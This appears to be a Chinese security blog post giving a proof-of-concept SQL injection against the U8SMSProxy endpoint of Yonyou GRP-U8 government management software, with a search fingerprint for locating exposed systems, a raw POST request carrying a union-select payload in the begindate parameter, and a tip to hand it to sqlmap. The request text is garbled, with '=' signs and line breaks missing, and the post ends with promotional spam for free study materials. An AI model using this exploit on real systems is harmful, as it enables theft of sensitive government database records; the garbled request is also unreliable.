sql注入漏洞名词解释,sql注入漏洞攻击实验

0x01 漏洞介绍
用友GRP-U8 R10政务管理软件是由用友政务公司基于云技术所推出的第十代政务产品。这款产品继承了用友R9、R9i、U8等行政事业版产品的各项优点并融合了全国广大用户的最佳实践应用。它旨在为政府财政部门、社保部门、卫生部门、教育部门、民政部门、党务部门以及农村等政府及行政事业单位提供专业管理解决方案。该漏洞存在于U8SMSProxy后端对begindate传参的数据值没有进行严格的过滤从而导致SQL注入攻击者可以利用该漏洞获取数据库敏感信息。
0x02 影响版本

用友GRP-U8行政事业内控管理软件

0x03 语法特征

title用友GRP-U8行政事业内控管理软件

0x04 漏洞复现
页面
 

POC

POST /U8SMSProxy?classXXNote&idqryyfs HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept-Encoding: gzip, deflateAccept: text/html,application/xhtmlxml,application/xml;q0.9,/;q0.8Connection: closeAccept-Language: zh-CN,zh;q0.8,en-US;q0.5,en;q0.3DNT: 1Upgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 64begindatexxxunion select 6/3-- &enddate2023-10-27&search

直接copy进文件打”*”号sqlmap一把嗦

学习框架已经整理完毕现在就差资料资源了我这里整理了所有知识点对应的资料资源文档大家不想一个一个去找的话可以参考一下这些资料

    点赞收藏评论区留言“已关注 求 ”都可以免费分享给大家等不及的小伙伴也可以直接厚台踢我或者关注我之后后台会自动发送给大家关注后大家注意看后台消息就行

V【zkaq222】或者下面的扫码不然通不过哦免费领取安全学习资料包私聊进群一起学习共同进步腾讯文档-在线文档